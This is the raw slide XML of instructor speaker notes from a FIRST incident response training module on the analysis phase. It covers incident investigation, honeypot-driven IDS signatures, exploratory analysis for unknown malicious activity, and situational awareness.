                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In the most general terms, the Analysis phase involves taking your existing input information that has already been collected and prepared (whether actionable or not) and augmenting it with other sources of information to reach new conclusions. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>One example you will receive all the time is an incoming incident report that is delivered to your computer. The report will typically contain a textual description and logs. You will have to perform analysis to generate a conclusion on whether this affects your constituency and, if so, what to do.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This part of processing actionable information is very difficult to automate and is primarily manual. This is where you add the most value to your organization – using your perceptive observations and non-linear thinking. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Often your input data alone coming out of the Preparation stage does not give you enough information to be actionable and you need to enhance it before you can take any action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident investigation is a key activity during the Analysis phase.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The picture above illustrates how analysis can lead to actionable results. The network traffic captured by your honeypot is fed into a program that will extract common patterns. Your analysis of these common patterns will allow you to generate new IDS signatures. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Another example is combining a number of alerts to determine whether they are independent or part of a targeted campaign. If this is a targeted campaign, you can add new patterns, combine alerts together, or issue an advisory. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>What other sources could you use to lead to a new conclusion from an alert or a detection indicator?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You should be able to get a good list from the students. For example, a reputation service would tell you if the domain name was used by malware – intentionally or because of malicious code covertly installed on that machine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCB5942-3CE7-8749-BC56-BBE991E72CF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{01C5AA92-F489-004E-9BF5-4A5BC6BEC6F9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45061" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB75743-2C2B-7844-918A-95B93943C32A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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7106" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72012397-D58A-5D46-9F54-178332AA9047}"/>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06A56F1A-98B7-ED4A-93B7-88E91CF48E06}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75777" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C85030-7F87-BF47-8753-2F7B6BB5154C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212725" y="3719513"/>
            <a:ext cx="6430963" cy="6710362"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Exploratory Analysis: Searching for Malicious Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Exploratory analysis is the process of looking forward instead of backwards; of being proactive instead of reactive. The overall intent of this effort is to find previously-unknown malicious activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The goal is to discover new anomalies and threats against your environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You’ll want to make this an ongoing exercise within your team, performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>iteratively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This proactive examination has a side benefit of raising the competencies of the staff and the team as a whole. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You will want to take your knowledge of your infrastructure and see if you can spot any unusual behavior. For example, you might discover there is a sudden rise in the number of outgoing SSH connections logged by your firewall, or malware that you had previously identified and eradicated is now being installed on the latest version of your application. With each new discovery you’ll want to explore whether you can create detection indicators. Ideally, these indicators can be implemented in your automated monitoring infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Share insights you find with your team and with the community as applicable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Does your team have a regular background task of exploratory analysis? If so, what have been the results? If not, do you think you could benefit from this type of activity?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Guide learners back to the principles listed on the slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>So we have explored the many aspects of the investigation part of Analysis. The next area we will discuss is situational awareness. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65E088D-9063-3346-9D75-4855B7EA119E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{31FAC6D3-B2FA-5341-9179-045C6954D47F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C865BE-2938-6545-8944-D22585170F39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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9154" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC11698A-CE92-044E-AC62-CB5020EF71B0}"/>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644BC3A1-8B62-2D47-AC44-3C1EDCB91184}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76801" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02B3EEB-A2C4-1B48-9E26-7CA2D2DC64A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Situational Awareness Is Foundational: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Situational awareness is simply knowing what’s going on with the environments for which you are responsible. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You may ask yourself, “Why is situational awareness important?” There are several answers to that. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The overall answer is that you want to be able to more quickly handle new incoming security events such as attacks, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>malware, and other security issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>All of this depends on having a current high-level or strategic threat assessment for your organization to which you can refer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Awareness of your current threat landscape allows you to move swiftly to address the issues. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49156" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13767751-7F89-7744-972F-4E87BB1CDBFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{92D7D2DC-3A4E-9644-9C90-4D92D3B695B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C1AA77-9B75-FE49-95CE-A0B9DE79DCD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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02" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452399B7-E7B4-AC47-BDB9-045FF46AA26E}"/>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3DB26230-7E44-3E44-8D0A-9FFF624F78D5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77825" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
